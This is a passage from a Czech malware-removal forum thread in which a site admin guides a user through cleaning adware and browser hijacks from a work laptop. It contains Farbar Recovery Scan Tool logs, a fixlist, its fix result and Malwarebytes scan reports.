Pokud je tento počítač řadičem domény pro určenou doménu,
nastaví zabezpečenou relaci s emulátorem primárního řadiče domény v určené
doméně. V opačném případě tento počítač nastaví zabezpečenou relaci s libovolným řadičem domény
v určené doméně.

Error: (04/10/2017 07:27:11 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: Zpracování zásad skupiny selhalo v důsledku toho, že se nebylo v síti možné připojit k řadiči domény. Může se jednat o přechodný stav. Po připojení počítače k řadiči domény a úspěšném zpracování zásad skupiny bude odeslána zpráva o úspěšné provedení těchto akcí. Pokud se tato zpráva nezobrazí během několika hodin, obraťte se na správce.

Error: (04/10/2017 01:09:17 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CEDA)
Description: Zpracování zásad skupiny selhalo v důsledku toho, že se nebylo v síti možné připojit k řadiči domény. Může se jednat o přechodný stav. Po připojení počítače k řadiči domény a úspěšném zpracování zásad skupiny bude odeslána zpráva o úspěšné provedení těchto akcí. Pokud se tato zpráva nezobrazí během několika hodin, obraťte se na správce.

Error: (04/10/2017 01:09:17 PM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: Tento počítač nemohl nastavit zabezpečenou relaci s řadičem
domény v doméně CEDA z následujícího důvodu:
Pro vyřízení žádosti o přihlášení nejsou nyní k dispozici žádné přihlašovací servery.


To může vést k potížím při ověřování. Přesvědčte se, zda je tento
počítač připojen k síti. Pokud potíže trvají,
obraťte se na správce domény.



DALŠÍ INFORMACE

Pokud je tento počítač řadičem domény pro určenou doménu,
nastaví zabezpečenou relaci s emulátorem primárního řadiče domény v určené
doméně. V opačném případě tento počítač nastaví zabezpečenou relaci s libovolným řadičem domény
v určené doméně.

Error: (04/10/2017 08:02:29 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Zavedení následujícího ovladače pro spouštění počítače nebo systému se nezdařilo:
cdrom

Error: (04/09/2017 11:05:44 PM) (Source: Microsoft-Windows-Directory-Services-SAM) (EventID: 12291) (User: NT AUTHORITY)
Description: Službě SAM se nepodařilo spustit podproces naslouchání protokolu TCP/IP nebo SPX/IPX.

Error: (04/09/2017 11:05:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Služba Instalační služba modulů systému Windows byla ukončena s následující chybou:
%%16405

Error: (04/09/2017 11:05:41 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Zavedení následujícího ovladače pro spouštění počítače nebo systému se nezdařilo:
cdrom

Error: (04/09/2017 11:05:39 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: Zpracování zásad skupiny selhalo. Systém Windows nerozpoznal název počítače. Může to být způsobeno jedním nebo více z následujících důvodů:
a) Selhal překlad IP adres v aktuálním řadiči domény.
b) Čekací doba replikace služby Active Directory (účet vytvořený na jiném řadiči domény nebyl replikován na aktuální řadič domény).


CodeIntegrity:
===================================
Date: 2017-04-10 12:26:48.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 12:26:48.303
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 12:12:06.540
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 12:12:06.510
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 12:03:15.984
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 12:03:15.964
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 11:46:02.921
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 11:46:02.891
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 10:32:06.081
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-10 10:32:06.051
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz
Percentage of memory in use: 30%
Total physical RAM: 8083.11 MB
Available physical RAM: 5621.87 MB
Total Virtual: 16164.4 MB
Available Virtual: 13752.5 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:220.26 GB) (Free:152.33 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (HP_RECOVERY) (Fixed) (Total:15.21 GB) (Free:1.67 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (HP_TOOLS) (Fixed) (Total:1.99 GB) (Free:1.95 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 8E59DEA1)
Partition 1: (Active) - (Size=1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=220.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.2 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=2 GB) - (Type=0B)

==================== End of Addition.txt ============================
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118244
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Kontrola, pracovní NTB

#8 Příspěvek od Rudy »

Otevřte poznámkový blok a zkopírujte do něj:
Start
initialpage123 - Uninstall (HKLM-x32\...\{234AC151-AFED-40DC-BA3E-22E7414440F1}) (Version: - ) <==== ATTENTION
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Task: {1EA529FC-F4AC-40CF-AAAA-44CE2D029937} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
Task: {298035C0-1B4E-42EE-B39F-9BFC54AF00BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
GroupPolicy: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
FF NewTab: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485 ... 24&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF Homepage: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485 ... 24&type=hp
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
C:\Windows\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat
C:\Windows\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
C:\Windows\system32\{8A694AF2-286D-429D-867A-3F95898EE308}.bat
C:\Windows\SysWOW64\SET3D26.tmp
C:\Windows\system32\SET4F33.tmp
C:\Windows\system32\SET4DD6.tmp
C:\Windows\system32\SET4968.tmp
C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
C:\Users\Tesla\AppData\Local\Temp

EmptyTemp:
End
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#9 Příspěvek od Tesla »

Přihlášení trvalo déle než 15 minut. Restartoval jsem a potom se do Windows přihlásil asi tak po 20 vteřinách. Což je doba, kterou to trvá vždy mimo firemní síť LAN, to mi taky přišlo divné.

Log zde:

Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by Tesla (10-04-2017 20:25:18) Run:1
Running from C:\Users\Tesla\Desktop
Loaded Profiles: Tesla (Available Profiles: Tesla & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
initialpage123 - Uninstall (HKLM-x32\...\{234AC151-AFED-40DC-BA3E-22E7414440F1}) (Version: - ) <==== ATTENTION
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Task: {1EA529FC-F4AC-40CF-AAAA-44CE2D029937} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
Task: {298035C0-1B4E-42EE-B39F-9BFC54AF00BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
GroupPolicy: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
FF NewTab: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485 ... 24&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF Homepage: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485 ... 24&type=hp
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
C:\Windows\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat
C:\Windows\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
C:\Windows\system32\{8A694AF2-286D-429D-867A-3F95898EE308}.bat
C:\Windows\SysWOW64\SET3D26.tmp
C:\Windows\system32\SET4F33.tmp
C:\Windows\system32\SET4DD6.tmp
C:\Windows\system32\SET4968.tmp
C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
C:\Users\Tesla\AppData\Local\Temp

EmptyTemp:
End
*****************

initialpage123 - Uninstall (HKLM-x32\...\{234AC151-AFED-40DC-BA3E-22E7414440F1}) (Version: - ) <==== ATTENTION => Error: No automatic fix found for this entry.
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) => Error: No automatic fix found for this entry.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EA529FC-F4AC-40CF-AAAA-44CE2D029937} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EA529FC-F4AC-40CF-AAAA-44CE2D029937} => key removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{298035C0-1B4E-42EE-B39F-9BFC54AF00BB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{298035C0-1B4E-42EE-B39F-9BFC54AF00BB} => key removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore => key removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => key removed successfully
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => key removed successfully
HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => key removed successfully
HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => key removed successfully
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => key removed successfully
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => key removed successfully
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => key removed successfully
HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => key removed successfully
HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => key removed successfully
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => key removed successfully
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => key removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page => value removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => value removed successfully
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
Firefox "newtab" removed successfully
Firefox DefaultSearchEngine removed successfully
Firefox SelectedSearchEngine removed successfully
Firefox "homepage" removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
"C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA" => not found.
"C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore" => not found.
C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat => moved successfully
C:\Windows\system32\{86F549EB-A66B-4D6C-958D-CDDD66410751}.bat => moved successfully
C:\Windows\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat => moved successfully
C:\Windows\system32\{8A694AF2-286D-429D-867A-3F95898EE308}.bat => moved successfully
C:\Windows\SysWOW64\SET3D26.tmp => moved successfully
C:\Windows\system32\SET4F33.tmp => moved successfully
C:\Windows\system32\SET4DD6.tmp => moved successfully
C:\Windows\system32\SET4968.tmp => moved successfully
C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat => moved successfully

"C:\Users\Tesla\AppData\Local\Temp" folder move:

Could not move "C:\Users\Tesla\AppData\Local\Temp" => Scheduled to move on reboot.


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7462236 B
Java, Flash, Steam htmlcache => 12479959 B
Windows/system/drivers => 874586 B
Edge => 0 B
Chrome => 542932812 B
Firefox => 4619446 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16674 B
systemprofile32 => 66356 B
LocalService => 0 B
NetworkService => 0 B
Krchnacek => 0 B
Tesla => 60558679 B
Administrator.CEDA => 0 B
Test => 0 B

RecycleBin => 0 B
EmptyTemp: => 607.9 MB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 10-04-2017 20:44:30)

C:\Users\Tesla\AppData\Local\Temp => moved successfully

==== End of Fixlog 20:44:30 ====
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#10 Příspěvek od Tesla »

Taktéž se po restartu vypíná windows firewall.
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118244
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Kontrola, pracovní NTB

#11 Příspěvek od Rudy »

Udělejte kompletní sken MBAM: http://www.malwarebytes.org/mbam.php a dejte log. Předem nic nemažte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#12 Příspěvek od Tesla »

Malwarebytes
www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 10.04.17
Čas skenování: 21:36
Logovací soubor:
Správce: Ano

-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.96
Aktualizovat verzi balíku komponent: 1.0.1699
Licence: Zkušební

-Systémová informace-
OS: Windows 7 Service Pack 1
CPU: x64
Systém souborů: NTFS
Uživatel: System

-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 388710
Uplynulý čas: 2 min, 56 sek

-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno

-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)

Modul: 0
(Nebyly zjištěny žádné škodlivé položky)

Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)

Soubor: 9
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\SEARCHPLUGINS\59AGJA1F.XML, Žádná uživatelská akce, [220], [387118],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\PROFILES\TUTOYATOQERGHT.DEFAULT\PREFS.JS, Žádná uživatelská akce, [220], [387123],1.0.1699
Adware.Elex, C:\USERS\TESLA\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\ZJX1FD7I.DEFAULT\SEARCHPLUGINS\59AGJA1F.XML, Žádná uživatelská akce, [220], [387119],1.0.1699

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)


(end)
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118244
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Kontrola, pracovní NTB

#13 Příspěvek od Rudy »

Všechny nálezy MBAM smažte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#14 Příspěvek od Tesla »

Podle logu se adware nedaří smazat:

Malwarebytes
www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 11.04.17
Čas skenování: 8:18
Logovací soubor:
Správce: Ano

-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.96
Aktualizovat verzi balíku komponent: 1.0.1702
Licence: Zkušební

-Systémová informace-
OS: Windows 7 Service Pack 1
CPU: x64
Systém souborů: NTFS
Uživatel: System

-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 389003
Uplynulý čas: 3 min, 57 sek

-Možnosti skenování-
